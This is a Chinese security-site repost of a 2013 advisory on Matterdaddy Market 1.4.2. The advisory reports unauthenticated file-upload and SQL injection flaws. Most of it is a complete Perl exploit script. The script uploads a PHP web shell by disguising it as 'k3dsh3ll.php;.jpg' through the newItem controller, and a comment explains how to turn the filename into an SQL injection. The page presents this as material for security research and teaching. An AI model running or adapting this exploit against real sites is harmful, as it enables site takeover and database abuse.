Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Matterdaddy Market多个安全漏洞

发布日期:2013-05-24
更新日期:2013-05-27受影响系统:
Matterdaddy Market Matterdaddy Market
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60150
 
Matterdaddy Market是市场和分类广告脚本。
 
Matterdaddy Market 1.4.2及其他版本存在多个安全漏洞,远程攻击者可利用这些漏洞执行未授权数据库操作。
 
<*来源:KedAns-Dz
 
 链接:http://packetstormsecurity.com/files/121745/mddmarket.pl.txt
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
 
use strict;
 use warnings;
 use LWP::UserAgent;
 use HTTP::Request::Common;
 print <<INTRO;
 |====================================================|
 |= Matterdaddy Market 1.4.2 File Uploader Fuzzer |
 |=       >> Provided By KedAns-Dz <<             |
 |=          e-mail : ked-h[at]hotmail.com            |
 |====================================================|
 INTRO
 print " ";
 print "[!] Enter URL(f.e: http://target.com): ";
   chomp(my $url=<STDIN>);
 print " ";
 print "[!] Enter File Path (f.e: C:\Shell.php;.gif): "; # File Path For Upload (usage : C:\Sh3ll.php;.gif)
   chomp(my $file=<STDIN>);
 my $ua = LWP::UserAgent->new;
 my $re = $ua->request(POST $url."/controller.php?op=newItem",
       Content_Type => "multipart/form-data",
       Content      =>
           [
       "md_title" => "1337day",
       "md_description" => "Inj3ct0r Exploit Database",
       "md_price" => "0",
       "md_email2" => "kedans@pene-test.dz", # put u"r email here !
       "city" => "Hassi Messaoud",
       "namer" => "KedAns-Dz",
       "category" => "4",
       "filetoupload" => $file,
   "filename" => "k3dsh3ll.php;.jpg",
 # to make this exploit as sqli change file name to :
 # k3dsh3ll" [+ SQLi +].php.jpg
 # use temperdata better ;)
       ] );
 print " ";
 if($re->is_success) {
   if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded! "; }
   else { print "[!] Check your email and confirm u"r post! "; }
 } else { print "[-] HTTP request Failed! "; }
 exit;建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Matterdaddy Market
 ------------------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
https://code.google.com/p/matterdaddy-market/Cisco WebEx for iOS 证书验证安全绕过漏洞(CVE-2012-6399)Microsoft Windows Kernel "Win32k.sys"本地拒绝服务漏洞(CVE-2013-3661)相关资讯      Matterdaddy Market  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图